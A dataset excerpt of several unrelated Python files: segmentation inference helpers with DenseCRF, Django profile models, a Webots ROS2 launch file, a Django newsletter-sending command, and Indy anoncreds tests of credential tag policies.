y1 = int(row * stride)
x2 = min(x1 + tile_size[1], full_image.shape[1])
y2 = min(y1 + tile_size[0], full_image.shape[0])
x1 = max(int(x2 - tile_size[1]), 0) # for portrait images the x1 underflows sometimes
y1 = max(int(y2 - tile_size[0]), 0) # for very few rows y1 underflows
img = full_image[y1:y2, x1:x2]
ed = edge[y1:y2, x1:x2]
padded_img, padding_index = pad_image(img, tile_size) #only happen in validation or test when the original image size is already smaller than tile_size
padded_ed, padding_ed_index = pad_image(ed, tile_size)
tile_counter += 1
padded_img = padded_img[None, :, :, :].astype('float32') # extend one dimension
padded_ed = np.squeeze(padded_ed)
padded_ed = padded_ed[None, :, :].astype('float32') # extend one dimension
padded_prediction = predictor(padded_img, padded_ed)[0][0]
prediction_no_padding = padded_prediction[padding_index[0]:padding_index[1],padding_index[2]:padding_index[3],:]
count_predictions[y1:y2, x1:x2] += 1
full_probs[y1:y2, x1:x2] += prediction_no_padding # accumulate the predictions also in the overlapping regions
# average the predictions in the overlapping regions
full_probs /= count_predictions
return full_probs
def edge_predict_scaler(full_image, edge, predictor, scales, classes, tile_size, is_densecrf=True):
""" scaler is only respnsible for generate multi scale input for slider """
full_probs = np.zeros((full_image.shape[0], full_image.shape[1], classes))
h_ori, w_ori = full_image.shape[:2]
for scale in scales:
scaled_img = cv2.resize(full_image, (int(scale*w_ori), int(scale*h_ori)))
scaled_edge = cv2.resize(edge, (int(scale * w_ori), int(scale * h_ori)))#resize on single channel will make extra dim disappear!!!
scaled_probs = edge_predict_slider(scaled_img, scaled_edge[:,:,None], predictor, classes, tile_size)
probs = cv2.resize(scaled_probs, (w_ori,h_ori))
full_probs += probs
full_probs /= len(scales)
if is_densecrf:
full_probs = dense_crf(full_probs,sxy_bilateral=(67,67),srgb_bilateral=(3,3,3), n_iters=10)
return full_probs
def predict_slider(full_image, predictor, classes, tile_size, overlap = 1.0/3):
if isinstance(tile_size, int):
tile_size = (tile_size, tile_size)
stride = ceil(tile_size[0] * (1 - overlap))
tile_rows = int(ceil((full_image.shape[0] - tile_size[0]) / stride) + 1) # strided convolution formula
tile_cols = int(ceil((full_image.shape[1] - tile_size[1]) / stride) + 1)
full_probs = np.zeros((full_image.shape[0], full_image.shape[1], classes))
count_predictions = np.zeros((full_image.shape[0], full_image.shape[1], classes))
tile_counter = 0
for row in range(tile_rows):
for col in range(tile_cols):
x1 = int(col * stride)
y1 = int(row * stride)
x2 = min(x1 + tile_size[1], full_image.shape[1])
y2 = min(y1 + tile_size[0], full_image.shape[0])
x1 = max(int(x2 - tile_size[1]), 0) # for portrait images the x1 underflows sometimes
y1 = max(int(y2 - tile_size[0]), 0) # for very few rows y1 underflows
img = full_image[y1:y2, x1:x2]
padded_img, padding_index = pad_image(img, tile_size) #only happen in validation or test when the original image size is already smaller than tile_size
tile_counter += 1
#padded_img = padded_img[None, :, :, :].astype('float32') # extend one dimension,must remove it, maybe influence other function.
padded_prediction = predictor(padded_img)# TODO dongzhuoyao, may be influence other function.
prediction_no_padding = padded_prediction[padding_index[0]:padding_index[1],padding_index[2]:padding_index[3],:]
count_predictions[y1:y2, x1:x2] += 1
full_probs[y1:y2, x1:x2] += prediction_no_padding # accumulate the predictions also in the overlapping regions
# average the predictions in the overlapping regions
try:
full_probs /= count_predictions
except:
from IPython import embed
embed()
return full_probs
def predict_scaler(full_image, predictor, scales, classes, tile_size, is_densecrf,overlap=1.0/3):
""" scaler is only respnsible for generate multi scale input for slider """
full_probs = np.zeros((full_image.shape[0], full_image.shape[1], classes)).astype(np.float32)
h_ori, w_ori = full_image.shape[:2]
for scale in scales:
scaled_img = cv2.resize(full_image, (int(scale*w_ori), int(scale*h_ori)))
scaled_probs = predict_slider(scaled_img, predictor, classes, tile_size, overlap)
probs = cv2.resize(scaled_probs, (w_ori,h_ori))
if scaled_probs.shape[-1]==1:
probs = probs[:,:,None]# if dimension is 1, resize will cause dimension missed, here just keep the dimension.
full_probs += probs
full_probs /= len(scales)
if is_densecrf:
full_probs = dense_crf(full_probs, sxy_bilateral=(67, 67), srgb_bilateral=(10,10,10), n_iters=10)
return full_probs
def visualize_feat_sigmoid(img,predictor,top_k=3):
output = predictor(img)
img_list = [output[:,:,i] for i in range(output.shape[-1])]
img_list = sorted(img_list, key=lambda x: np.linalg.norm(x,1), reverse=True) # sort inplace, time costing
result = []
def sigmoid(x, derivative=False):
return x * (1 - x) if derivative else 1 / (1 + np.exp(-x))
for i in range(top_k):
current = img_list[i]
current = sigmoid(current)*255
current = current.astype(np.uint8)
current = cv2.applyColorMap(current, cv2.COLORMAP_JET)#https://blog.csdn.net/loveliuzz/article/details/73648505
result.append(current)
return result
def visualize_feat(img,predictor):
output = predictor(img)
img_list = [output[:,:,i] for i in range(output.shape[-1])]
result = []
for i in range(len(img_list)):
current = img_list[i]
current = (current - np.min(current))*255/(np.max(current)-np.min(current))
mask = current
mask = mask[:,:,np.newaxis]* np.ones((1,1,3))
current = current.astype(np.uint8)
current = cv2.applyColorMap(current, cv2.COLORMAP_JET)#https://blog.csdn.net/loveliuzz/article/details/73648505
result.append(current)
result.append(mask)
return result
def visualize_feat_relative(img,predictor,top_k=5):
output = predictor(img)
img_list = [output[:,:,i] for i in range(output.shape[-1])]
img_list = sorted(img_list, key=lambda x: np.sum(x), reverse=True) # sort inplace, time costing
result = []
for i in range(top_k):
current = img_list[i]
current = (current - np.min(current))*255/(np.max(current)-np.min(current))
current = current.astype(np.uint8)
current = cv2.applyColorMap(current, cv2.COLORMAP_JET)#https://blog.csdn.net/loveliuzz/article/details/73648505
result.append(current)
return result
def dense_crf(probs, img=None, n_iters=10,
sxy_gaussian=(1, 1), compat_gaussian=4,
kernel_gaussian=dcrf.DIAG_KERNEL,
normalisation_gaussian=dcrf.NORMALIZE_SYMMETRIC,
sxy_bilateral=(49, 49), compat_bilateral=5,
srgb_bilateral=(13, 13, 13),
kernel_bilateral=dcrf.DIAG_KERNEL,
normalisation_bilateral=dcrf.NORMALIZE_SYMMETRIC):
"""DenseCRF over unnormalised predictions.
More details on the arguments at https://github.com/lucasb-eyer/pydensecrf.
Args:
probs: class probabilities per pixel.
img: if given, the pairwise bilateral potential on raw RGB values will be computed.
n_iters: number of iterations of MAP inference.
sxy_gaussian: standard deviations for the location component of the colour-independent term.
compat_gaussian: label compatibilities for the colour-independent term (can be a number, a 1D array, or a 2D array).
kernel_gaussian: kernel precision matrix for the colour-independent term (can take values CONST_KERNEL, DIAG_KERNEL, or FULL_KERNEL).
normalisation_gaussian: normalisation for the colour-independent term (possible values are NO_NORMALIZATION, NORMALIZE_BEFORE, NORMALIZE_AFTER, NORMALIZE_SYMMETRIC).
sxy_bilateral: standard deviations for the location component of the colour-dependent term.
compat_bilateral: label compatibilities for the colour-dependent term (can be a number, a 1D array, or a 2D array).
srgb_bilateral: standard deviations for the colour component of the colour-dependent term.
kernel_bilateral: kernel precision matrix for the colour-dependent term (can take values CONST_KERNEL, DIAG_KERNEL, or FULL_KERNEL).
normalisation_bilateral: normalisation for the colour-dependent term (possible values are NO_NORMALIZATION, NORMALIZE_BEFORE, NORMALIZE_AFTER, NORMALIZE_SYMMETRIC).
Returns:
Refined predictions after MAP inference.
"""
h, w, class_num = probs.shape
probs = probs.transpose(2, 0, 1).copy(order='C') # Need a contiguous array.
d = dcrf.DenseCRF2D(w, h, class_num) # Define DenseCRF model.
U = -np.log(probs) # Unary potential.
U = U.reshape((class_num, -1)).astype(np.float32) # Needs to be flat.
d.setUnaryEnergy(U)
d.addPairwiseGaussian(sxy=sxy_gaussian, compat=compat_gaussian,
kernel=kernel_gaussian, normalization=normalisation_gaussian)
if img is not None:
assert (img.shape[1:3] == (h, w)), "The image height and width must coincide with dimensions of the logits."
d.addPairwiseBilateral(sxy=sxy_bilateral, compat=compat_bilateral,
kernel=kernel_bilateral, normalization=normalisation_bilateral,
srgb=srgb_bilateral, rgbim=img[0])
Q = d.inference(n_iters)
preds = np.array(Q, dtype=np.float32).reshape((class_num, h, w)).transpose(1, 2, 0)
return preds
def predict_from_dir(mypredictor,image_dir,target_dir,CLASS_NUM,CROP_SIZE,is_densecrf, image_format="jpg",overlap=1.0/3):
ll = os.listdir(image_dir)
from tqdm import tqdm
for l in tqdm(ll):
filename = os.path.basename(l)
extension = filename.rsplit(".")[-1]
logger.info("process {}.".format(filename))
src_img = cv2.imread(os.path.join(image_dir,l))
result = predict_scaler(src_img, mypredictor, scales=[0.9,1,1.1], classes=CLASS_NUM, tile_size=CROP_SIZE, is_densecrf = is_densecrf, overlap=overlap)
result = np.argmax(result, axis=2)
cv2.imwrite(os.path.join(target_dir,filename),np.concatenate((src_img, visualize_label(result)), axis=1))
if __name__ == '__main__':
label = np.array([1,1,1,0,0,0,0])
pred = np.array([0,0,0,0,0,0,0])
cm = np.array([[0,0],[0,0]])
#cm = update_confusion_matrix(pred,label,cm,2)
prob = np.random.rand(10,10,3)
gt = np.ones((10,10,1),dtype=np.uint8)
prob.resize((100,3))
gt.resize((100))
gt_idx = np.where(gt>-1)[0]
idx = np.vstack((gt_idx,gt))
tmp = prob[list(idx)]
t = prob[[1,2,3],[2,0,0]]
pass
| StarcoderdataPython |
1770247 | <reponame>Gabr0/randomtestspython<filename>reversedstr.py<gh_stars>0
class ReversedStr(str):
def __new__(*args,**kwargs):
self = str.__new__(*args, **kwargs)
self = self[::-1]
return self
| StarcoderdataPython |
9735126 | from django.db import models
from django.contrib.auth.models import User
from translation_app.models import Origin
from file_app.models import UserIcon, AchievementIcon
# Create your models here.
class UserProfile(models.Model):
description = models.TextField('О себе', max_length=1000, blank=True, null=True)
user = models.OneToOneField(User, related_name='user_profile',
verbose_name='Основной пользователь', on_delete=models.CASCADE)
achievements = models.ManyToManyField('Achievement', verbose_name='Достижения', related_name='user_profile_set',
blank=True)
on_hold = models.ManyToManyField(Origin, verbose_name='Отложенное', related_name='user_profile_set', blank=True)
profile_icon = models.ForeignKey(UserIcon, verbose_name='Аватарка', on_delete=models.SET_NULL,
blank=True, null=True)
class Meta:
verbose_name = 'Профиль пользователя'
verbose_name_plural = 'Профили пользователей'
def __str__(self):
return self.user.username
class Achievement(models.Model):
name = models.CharField('Название', max_length=30)
description = models.TextField('Описание', max_length=500, blank=True, null=True)
rate = models.IntegerField('Стоимость', default=1)
icon = models.ForeignKey(AchievementIcon, verbose_name='Иконка', on_delete=models.SET_NULL,
blank=True, null=True)
class Meta:
verbose_name = 'Достижение'
verbose_name_plural = 'Достижения'
ordering = ['name']
def __str__(self):
return self.name
| StarcoderdataPython |
12807688 | #!/usr/bin/env python
# Copyright 1996-2019 Cyberbotics Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Launch Webots and the controller."""
import os
from pathlib import Path
import launch
import launch_ros.actions
from launch.actions import IncludeLaunchDescription
from launch.launch_description_sources import PythonLaunchDescriptionSource
from ament_index_python.packages import get_package_share_directory
def generate_launch_description():
# Webots
package_dir = get_package_share_directory('webots_ros2_universal_robot')
webots = IncludeLaunchDescription(
PythonLaunchDescriptionSource(
os.path.join(get_package_share_directory('webots_ros2_core'), 'launch', 'robot_launch.py')
),
launch_arguments={
'executable': 'webots_robotic_arm_node',
'world': os.path.join(package_dir, 'worlds', 'universal_robot.wbt'),
}.items()
)
# Copy .rviz config file and update path ro URDF file.
templateRvizFile = os.path.join(get_package_share_directory('webots_ros2_ur_e_description'),
'rviz', 'view_robot') + '.rviz'
home = Path.home()
customRvizFile = os.path.join(home, 'webots_ros2_ur_e_description.rviz')
if not os.path.exists(os.path.join(home, 'webots_ros2_ur_e_description.rviz')):
with open(templateRvizFile, 'r') as f:
content = f.read()
content = content.replace('package://webots_ros2_ur_e_description',
get_package_share_directory('webots_ros2_ur_e_description'))
with open(customRvizFile, 'w') as f2:
f2.write(content)
# Rviz node
rviz = launch_ros.actions.Node(package='rviz2',
node_executable='rviz2',
arguments=['-d', customRvizFile],
output='screen')
return launch.LaunchDescription([
rviz,
webots
])
| StarcoderdataPython |
12855413 | import pygame
from gui_components.gui_util import get_font, BLACK, BLUE, GRAY
class Cell:
def __init__(self, value, row, col, width, height):
self.value = value
self.temp = 0
self.row = row
self.col = col
self.width = width
self.height = height
self.set_by_user = False
self.selected = False
def draw(self, win):
font = get_font("arial", 40)
gap = self.width / 9
x = self.col * gap
y = self.row * gap
if self.temp != 0 and self.value == 0:
text = font.render(str(self.temp), 1, GRAY)
win.blit(text, (x + 45, y + 5))
elif not (self.value == 0):
color = BLACK
if self.set_by_user:
color = BLUE
text = font.render(str(self.value), 1, color)
win.blit(text, (x + (gap / 2 - text.get_width() / 2), y + (gap / 2 - text.get_height() / 2)))
if self.selected:
pygame.draw.rect(win, BLUE, (x, y, gap, gap), 5)
def set_value(self, val, set_by_user: bool = False):
self.value = val
self.temp = 0
self.set_by_user = set_by_user
def set_temp(self, val):
self.value = 0
self.temp = val
| StarcoderdataPython |
11356301 | <reponame>sirodoht/mataroa<gh_stars>10-100
from datetime import timedelta
from django.conf import settings
from django.core import mail
from django.core.management.base import BaseCommand
from django.utils import timezone
from main import models, util
def get_mail_connection():
"""Returns the default EmailBackend but instantiated with a custom host."""
return mail.get_connection(
"django.core.mail.backends.smtp.EmailBackend",
host=settings.EMAIL_HOST_BROADCASTS,
)
def get_email_body(post, notification):
"""Returns the email body (which contains the post body) along with titles and links."""
post_url = util.get_protocol() + post.get_proper_url()
unsubscribe_url = util.get_protocol() + notification.get_unsubscribe_url()
blog_title = post.owner.blog_title or post.owner.username
body = f"{blog_title} has published a new blog post titled:\n{post.title}\n"
body += "\n"
body += f"Find the complete text at:\n{post_url}\n"
body += "\n"
body += "Or read it below:\n"
body += "\n"
body += "# " + post.title + "\n"
body += "\n"
body += post.body + "\n"
body += "\n"
body += "---\n"
body += "\n"
body += f"Read at {post_url}\n"
body += "\n"
body += "---\n"
body += "\n"
body += "To unsubscribe click at:\n"
body += unsubscribe_url + "\n"
return body
def get_email(post, notification):
"""Returns the email object, containing all info needed to be sent."""
blog_title = post.owner.blog_title or post.owner.username
unsubscribe_url = util.get_protocol() + notification.get_unsubscribe_url()
body = get_email_body(post, notification)
email = mail.EmailMessage(
subject=post.title,
body=body,
from_email=f"{blog_title} <{post.owner.username}@{settings.EMAIL_FROM_HOST}>",
to=[notification.email],
reply_to=[post.owner.email],
headers={
"X-PM-Message-Stream": "newsletters",
"List-Unsubscribe": unsubscribe_url,
"List-Unsubscribe-Post": "List-Unsubscribe=One-Click",
},
)
return email
class Command(BaseCommand):
help = "Processes new posts and sends email to subscribers"
def handle(self, *args, **options):
# if false, then we do not actually send emails,
# only process the ones to be canceled
send_mode = True
if timezone.now().hour != 13:
msg = "Current UTC not 13:00. Will not send emails, only process canceled."
self.stdout.write(self.style.NOTICE(msg))
send_mode = False
self.stdout.write(self.style.NOTICE("Processing notifications."))
# list of messages to sent out
message_list = []
# get all notification records without sent_at
# which means they have not been sent out already
notification_records = models.NotificationRecord.objects.filter(sent_at=None)
for record in notification_records:
# if post has been deleted
# TODO: test case for this conditional
if not record.post:
# delete record
msg = (
f"Delete as post does not exist: for '{record.notification.email}'."
)
self.stdout.write(self.style.NOTICE(msg))
record.delete()
continue
# don't send, if blog has turned notifications off
if not record.post.owner.notifications_on:
# also delete record
msg = f"Delete as notifications off: '{record.post.title}' for '{record.notification.email}'."
self.stdout.write(self.style.NOTICE(msg))
record.delete()
continue
# don't send, if email has unsubscribed since records were enqueued
if not record.notification.is_active:
# also delete record
msg = f"Delete as email has unsubscribed: '{record.post.title}' for '{record.notification.email}'."
self.stdout.write(self.style.NOTICE(msg))
record.delete()
continue
# don't send, if post is on draft status
if not record.post.published_at:
# also delete record
msg = f"Delete as post is now a draft: '{record.post.title}' for '{record.notification.email}'."
self.stdout.write(self.style.NOTICE(msg))
record.delete()
continue
# don't send, if post publication date is not the day before
yesterday = timezone.now().date() - timedelta(days=1)
if record.post.published_at != yesterday:
msg = f"Skip as pub date is not yesterday: '{record.post.title}' for '{record.notification.email}'."
self.stdout.write(self.style.NOTICE(msg))
continue
# don't send, if notification record is canceled
if record.is_canceled:
msg = f"Skip as record is canceled: '{record.post.title}' for '{record.notification.email}'."
self.stdout.write(self.style.NOTICE(msg))
continue
# don't queue for sending, if send mode is off
if not send_mode:
continue
# add email object to list
email = get_email(record.post, record.notification)
message_list.append(email)
# log time email was added to the send-out list
# ideally we would like to log when each one was sent
# which is infeasible given the mass send strategy of newsletters
record.sent_at = timezone.now()
record.save()
msg = f"Logging record for '{record.post.title}' to '{record.notification.email}'."
self.stdout.write(self.style.SUCCESS(msg))
# return if send mode is off
if not send_mode:
self.stdout.write(
self.style.SUCCESS("Notifications processed. No emails were sent.")
)
return
# sent out messages
connection = get_mail_connection()
connection.send_messages(message_list)
self.stdout.write(
self.style.SUCCESS(f"Broadcast sent. Total {len(message_list)} emails.")
)
| StarcoderdataPython |
3540530 | <reponame>absltkaos/indy-sdk
import json
import pytest
from indy import anoncreds, error
async def _check_catpol(wallet_handle, cred_def_json, cred_def_id, cred_id, cred_value, offer_json, cred_req,
cred_req_metadata, taggables, retroactive, query_attrs, expect_cred_ids, expect_policy):
# Set policy
await anoncreds.prover_set_credential_attr_tag_policy(wallet_handle, cred_def_id, taggables, retroactive)
# Write credential
(cred, _, _) = await anoncreds.issuer_create_credential(wallet_handle, offer_json, cred_req,
json.dumps(cred_value), None, None)
await anoncreds.prover_store_credential(wallet_handle, cred_id, cred_req_metadata, cred, cred_def_json, None)
# Search on all tags
query_json = json.dumps({
**{'attr::{}::marker'.format(attr): '1' for attr in query_attrs},
**{'attr::{}::value'.format(attr): cred_value[attr]['raw'] for attr in query_attrs},
})
(handle, count) = await anoncreds.prover_search_credentials(wallet_handle, query_json)
found = json.loads(
await anoncreds.prover_fetch_credentials(handle, count))
assert {cred['referent'] for cred in found} == (expect_cred_ids or set())
await anoncreds.prover_close_credentials_search(handle)
# Get and check current policy
catpol = json.loads(await anoncreds.prover_get_credential_attr_tag_policy(wallet_handle, cred_def_id))
if expect_policy is None:
assert catpol is None
else:
assert set(catpol) == expect_policy
async def _check_query(wallet_handle, cred_value, attr, expect_cred_ids):
query_json = json.dumps({
'attr::{}::marker'.format(attr): '1',
'attr::{}::value'.format(attr): cred_value[attr]['raw']
})
(handle, count) = await anoncreds.prover_search_credentials(wallet_handle, query_json)
found = json.loads(
await anoncreds.prover_fetch_credentials(handle, count))
assert {cred['referent'] for cred in found} == (expect_cred_ids or set())
await anoncreds.prover_close_credentials_search(handle)
# noinspection PyUnusedLocal
@pytest.mark.asyncio
async def test_prover_credential_attr_tag_policy(wallet_handle, prepopulated_wallet, issuer_1_gvt_cred_def_id):
cred_values = {
i: {
'sex': {
'raw': ('male', 'female')[i % 2],
'encoded': ('123456789012', '135791357902')[i % 2]
},
'name': {
'raw': ('Wayne', 'Hailey', 'Sidney', 'Cammi', 'Connor')[i],
'encoded': ('987654321098', '876543210987', '765432109876', '654321098765', '543210987654')[i]
},
'height': {
'raw': ('180', '160', '183', '161', '192')[i],
'encoded': ('180', '160', '183', '161', '192')[i]
},
'age': {
'raw': str(60 + i),
'encoded': str(60 + i)
}
} for i in range(5)
}
(cred_def_json, offer_json, cred_req, cred_req_metadata) = prepopulated_wallet[0:4]
# SET POLICY NON-RETROACTIVELY when wallet has no credentials of interest
# Null policy (default, all attrs)
await _check_catpol(wallet_handle=wallet_handle,
cred_def_json=cred_def_json,
cred_def_id=issuer_1_gvt_cred_def_id,
cred_id='cred-0.0',
cred_value=cred_values[0],
offer_json=offer_json,
cred_req=cred_req,
cred_req_metadata=cred_req_metadata,
taggables=None,
retroactive=False,
query_attrs=[attr for attr in cred_values[0]],
expect_cred_ids={'cred-0.0'},
expect_policy=None)
# No-attrs policy
await _check_catpol(wallet_handle=wallet_handle,
cred_def_json=cred_def_json,
cred_def_id=issuer_1_gvt_cred_def_id,
cred_id='cred-0.1',
cred_value=cred_values[1],
offer_json=offer_json,
cred_req=cred_req,
cred_req_metadata=cred_req_metadata,
taggables=json.dumps([]),
retroactive=False,
query_attrs=['name'],
expect_cred_ids=None,
expect_policy=set())
# One-attr policy
await _check_catpol(wallet_handle=wallet_handle,
cred_def_json=cred_def_json,
cred_def_id=issuer_1_gvt_cred_def_id,
cred_id='cred-0.2',
cred_value=cred_values[2],
offer_json=offer_json,
cred_req=cred_req,
cred_req_metadata=cred_req_metadata,
taggables=json.dumps(['name']),
retroactive=False,
query_attrs=['name'],
expect_cred_ids={'cred-0.2'},
expect_policy={'name'})
await _check_query(wallet_handle=wallet_handle, # also ensure wallet does not tag untaggable attrs
cred_value=cred_values[2],
attr='age',
expect_cred_ids=None)
# All-but-one-attr policy
await _check_catpol(wallet_handle=wallet_handle,
cred_def_json=cred_def_json,
cred_def_id=issuer_1_gvt_cred_def_id,
cred_id='cred-0.3',
cred_value=cred_values[3],
offer_json=offer_json,
cred_req=cred_req,
cred_req_metadata=cred_req_metadata,
taggables=json.dumps(['sex', 'height', 'age']),
retroactive=False,
query_attrs=['sex', 'height', 'age'],
expect_cred_ids={'cred-0.3'},
expect_policy={'sex', 'height', 'age'})
await _check_query(wallet_handle=wallet_handle, # also ensure wallet does not tag untaggable attrs
cred_value=cred_values[3],
attr='name',
expect_cred_ids=None)
# Explicit all-attrs policy
await _check_catpol(wallet_handle=wallet_handle,
cred_def_json=cred_def_json,
cred_def_id=issuer_1_gvt_cred_def_id,
cred_id='cred-0.4',
cred_value=cred_values[4],
offer_json=offer_json,
cred_req=cred_req,
cred_req_metadata=cred_req_metadata,
taggables=json.dumps([attr for attr in cred_values[4]]),
retroactive=False,
query_attrs=[attr for attr in cred_values[4]],
expect_cred_ids={'cred-0.4'},
expect_policy={attr for attr in cred_values[4]})
# SET POLICY RETROACTIVELY
# Null policy (default, all attrs)
await _check_catpol(wallet_handle=wallet_handle,
cred_def_json=cred_def_json,
cred_def_id=issuer_1_gvt_cred_def_id,
cred_id='cred-1.0',
cred_value=cred_values[0],
offer_json=offer_json,
cred_req=cred_req,
cred_req_metadata=cred_req_metadata,
taggables=None,
retroactive=True,
query_attrs=[attr for attr in cred_values[0]],
expect_cred_ids={'cred-0.0', 'cred-1.0'},
expect_policy=None)
# No-attrs policy
await _check_catpol(wallet_handle=wallet_handle,
cred_def_json=cred_def_json,
cred_def_id=issuer_1_gvt_cred_def_id,
cred_id='cred-1.1',
cred_value=cred_values[1],
offer_json=offer_json,
cred_req=cred_req,
cred_req_metadata=cred_req_metadata,
taggables=json.dumps([]),
retroactive=True,
query_attrs=['name'],
expect_cred_ids=None,
expect_policy=set())
# One-attr policy
await _check_catpol(wallet_handle=wallet_handle,
cred_def_json=cred_def_json,
cred_def_id=issuer_1_gvt_cred_def_id,
cred_id='cred-1.2',
cred_value=cred_values[2],
offer_json=offer_json,
cred_req=cred_req,
cred_req_metadata=cred_req_metadata,
taggables=json.dumps(['name']),
retroactive=True,
query_attrs=['name'],
expect_cred_ids={'cred-0.2', 'cred-1.2'},
expect_policy={'name'})
await _check_query(wallet_handle=wallet_handle, # also ensure wallet does not tag untaggable attrs
cred_value=cred_values[2],
attr='age',
expect_cred_ids=None)
# All-but-one-attr policy
await _check_catpol(wallet_handle=wallet_handle,
cred_def_json=cred_def_json,
cred_def_id=issuer_1_gvt_cred_def_id,
cred_id='cred-1.3',
cred_value=cred_values[3],
offer_json=offer_json,
cred_req=cred_req,
cred_req_metadata=cred_req_metadata,
taggables=json.dumps(['sex', 'height', 'age']),
retroactive=True,
query_attrs=['sex', 'height', 'age'],
expect_cred_ids={'cred-0.3', 'cred-1.3'},
expect_policy={'sex', 'height', 'age'})
await _check_query(wallet_handle=wallet_handle, # also ensure wallet does not tag untaggable attrs
cred_value=cred_values[3],
attr='name',
expect_cred_ids=None)
# Explicit all-attrs policy
await _check_catpol(wallet_handle=wallet_handle,
cred_def_json=cred_def_json,
cred_def_id=issuer_1_gvt_cred_def_id,
cred_id='cred-1.4',
cred_value=cred_values[4],
offer_json=offer_json,
cred_req=cred_req,
cred_req_metadata=cred_req_metadata,
taggables=json.dumps([attr for attr in cred_values[4]]),
retroactive=True,
query_attrs=[attr for attr in cred_values[4]],
expect_cred_ids={'cred-0.4', 'cred-1.4'},
expect_policy={attr for attr in cred_values[4]})
# SET POLICY NON-RETROACTIVELY when wallet has some credentials of interest
# Null policy (default, all attrs)
await _check_catpol(wallet_handle=wallet_handle,
cred_def_json=cred_def_json,
cred_def_id=issuer_1_gvt_cred_def_id,
cred_id='cred-2.0',
cred_value=cred_values[0],
offer_json=offer_json,
cred_req=cred_req,
cred_req_metadata=cred_req_metadata,
taggables=None,
retroactive=False,
query_attrs=[attr for attr in cred_values[0]],
expect_cred_ids={'cred-0.0', 'cred-1.0', 'cred-2.0'},
expect_policy=None)
# No-attrs policy
await _check_catpol(wallet_handle=wallet_handle,
cred_def_json=cred_def_json,
cred_def_id=issuer_1_gvt_cred_def_id,
cred_id='cred-2.1',
cred_value=cred_values[1],
offer_json=offer_json,
cred_req=cred_req,
cred_req_metadata=cred_req_metadata,
taggables=json.dumps([]),
retroactive=False,
query_attrs=['name'],
expect_cred_ids={'cred-0.1', 'cred-1.1'},
expect_policy=set())
# One-attr policy
await _check_catpol(wallet_handle=wallet_handle,
cred_def_json=cred_def_json,
cred_def_id=issuer_1_gvt_cred_def_id,
cred_id='cred-2.2',
cred_value=cred_values[2],
offer_json=offer_json,
cred_req=cred_req,
cred_req_metadata=cred_req_metadata,
taggables=json.dumps(['name']),
retroactive=False,
query_attrs=['name'],
expect_cred_ids={'cred-0.2', 'cred-1.2', 'cred-2.2'},
expect_policy={'name'})
await _check_query(wallet_handle=wallet_handle, # also ensure wallet does not tag untaggable attrs
cred_value=cred_values[2],
attr='age',
expect_cred_ids={'cred-0.2', 'cred-1.2'})
# All-but-one-attr policy
await _check_catpol(wallet_handle=wallet_handle,
cred_def_json=cred_def_json,
cred_def_id=issuer_1_gvt_cred_def_id,
cred_id='cred-2.3',
cred_value=cred_values[3],
offer_json=offer_json,
cred_req=cred_req,
cred_req_metadata=cred_req_metadata,
taggables=json.dumps(['sex', 'height', 'age']),
retroactive=False,
query_attrs=['sex', 'height', 'age'],
expect_cred_ids={'cred-0.3', 'cred-1.3', 'cred-2.3'},
expect_policy={'sex', 'height', 'age'})
await _check_query(wallet_handle=wallet_handle, # also ensure wallet does not tag untaggable attrs
cred_value=cred_values[3],
attr='name',
expect_cred_ids={'cred-0.3', 'cred-1.3'})
# Explicit all-attrs policy
await _check_catpol(wallet_handle=wallet_handle,
cred_def_json=cred_def_json,
cred_def_id=issuer_1_gvt_cred_def_id,
cred_id='cred-2.4',
cred_value=cred_values[4],
offer_json=offer_json,
cred_req=cred_req,
cred_req_metadata=cred_req_metadata,
taggables=json.dumps([attr for attr in cred_values[4]]),
retroactive=False,
query_attrs=[attr for attr in cred_values[4]],
expect_cred_ids={'cred-0.4', 'cred-1.4', 'cred-2.4'},
expect_policy={attr for attr in cred_values[4]})
# RESTORE wallet state: delete credentials created in this test
for i in range(3):
for j in range(5):
await anoncreds.prover_delete_credential(wallet_handle, 'cred-{}.{}'.format(i, j))
credentials = json.loads(await anoncreds.prover_get_credentials(wallet_handle, "{}"))
assert len(credentials) == 3
# noinspection PyUnusedLocal
@pytest.mark.asyncio
async def test_prover_credential_attr_tag_policy_works_for_invalid_wallet(wallet_handle,
prepopulated_wallet,
issuer_1_gvt_cred_def_id):
invalid_wallet_handle = wallet_handle + 100
with pytest.raises(error.WalletInvalidHandle):
await anoncreds.prover_set_credential_attr_tag_policy(invalid_wallet_handle,
issuer_1_gvt_cred_def_id, None, False)
with pytest.raises(error.WalletInvalidHandle):
await anoncreds.prover_get_credential_attr_tag_policy(invalid_wallet_handle, issuer_1_gvt_cred_def_id)
# noinspection PyUnusedLocal
@pytest.mark.asyncio
async def test_prover_credential_attr_tag_policy_works_for_redundant_attr(wallet_handle,
prepopulated_wallet,
issuer_1_gvt_cred_def_id):
# Set policy
await anoncreds.prover_set_credential_attr_tag_policy(wallet_handle, issuer_1_gvt_cred_def_id,
json.dumps(['age', 'age']), False)
# Get and check current policy
catpol = json.loads(await anoncreds.prover_get_credential_attr_tag_policy(wallet_handle, issuer_1_gvt_cred_def_id))
assert catpol == ['age']
# Clear policy
await anoncreds.prover_set_credential_attr_tag_policy(wallet_handle, issuer_1_gvt_cred_def_id, None, False)
# noinspection PyUnusedLocal
@pytest.mark.asyncio
async def test_prover_credential_attr_tag_policy_works_for_non_canonical_attr(wallet_handle,
prepopulated_wallet,
issuer_1_gvt_cred_def_id):
cred_value = {
'sex': {
'raw': 'female',
'encoded': '135791357902'
},
'name': {
'raw': 'Eveliina',
'encoded': '321098765432'
},
'height': {
'raw': '162',
'encoded': '162'
},
'age': {
'raw': str(65),
'encoded': str(65)
}
}
(cred_def_json, offer_json, cred_req, cred_req_metadata) = prepopulated_wallet[0:4]
# One-attr policy, specified with non-canonical attr
await _check_catpol(wallet_handle=wallet_handle,
cred_def_json=cred_def_json,
cred_def_id=issuer_1_gvt_cred_def_id,
cred_id='<PASSWORD>',
cred_value=cred_value,
offer_json=offer_json,
cred_req=cred_req,
cred_req_metadata=cred_req_metadata,
taggables=json.dumps(['NAME']),
retroactive=False,
query_attrs=['name'],
expect_cred_ids={'cred-eve'},
expect_policy={'name'})
# Restore wallet state: delete credentials created in this test
await anoncreds.prover_delete_credential(wallet_handle, 'cred-eve')
